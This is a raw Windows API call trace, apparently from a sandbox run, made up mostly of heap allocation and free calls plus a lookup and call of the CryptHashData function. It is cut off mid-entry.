HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0161.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0161.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0161.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0161.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0161.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0161.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0161.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0161.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0161.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0161.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0161.870] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0161.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0161.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0161.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0161.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0161.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0161.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0161.870] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0161.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0161.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0161.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0161.870] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0161.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0161.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0161.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0161.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0161.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0161.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0161.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0161.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0161.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0161.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0161.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0161.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0161.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0161.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0161.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0161.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0161.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0161.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0161.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0161.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0161.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0161.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0161.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0161.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0161.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0161.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0161.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0161.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0161.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0161.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0161.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0161.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0161.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0161.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0161.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0161.872] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0161.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0161.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0161.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0161.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0161.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0161.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0161.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0161.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0161.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0161.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0161.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0161.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0161.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0161.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0161.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0161.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0161.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0161.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0161.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0161.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0161.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e509f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0161.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0161.873] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0161.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0161.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0161.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0161.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0161.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0161.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0161.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0161.874] CryptHashData (hHash=0xa872d0, pbData=0x2e54e28, dwDataLen=0x3, dwFlags=0x1) returned 1 [0161.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0161.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0161.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0161.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0161.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0161.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0161.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0161.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0161.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0161.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0161.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0161.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0161.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0161.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0161.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0161.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0161.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0161.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0161.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0161.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0161.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0161.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0161.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0161.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0161.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0161.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0161.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0161.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0161.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0161.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0161.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0161.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0161.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0161.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0161.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0161.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0161.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0161.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0161.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0161.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0161.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0161.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0161.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0161.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0161.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0161.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0161.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0161.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0161.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0161.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0161.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0161.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0161.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0161.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0161.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0161.876] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0161.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0161.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0161.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0161.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0161.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0161.876] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0161.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0161.876] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0161.876] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0161.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0161.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c68 [0161.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0161.877] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0161.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0161.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0161.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0161.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0161.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0161.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0161.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0161.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0161.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0161.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0161.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0161.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0161.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0161.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0161.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0161.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0161.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0161.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0161.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0161.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0161.878] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0161.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c80 [0161.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0161.878] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0161.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0161.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0161.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0161.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0161.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0161.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0161.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0161.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0161.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0161.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0161.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0161.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0161.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0161.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0161.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0161.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0161.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0161.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0161.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0161.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0161.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0161.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0161.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0161.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0161.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0161.880] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0161.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0161.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0161.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0161.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0161.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0161.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0161.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0161.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0161.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0161.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0161.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0161.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0161.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0161.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0161.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0161.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0161.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0161.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0161.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0161.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0161.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0161.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0161.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0161.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0161.881] RtlAllocateHeap 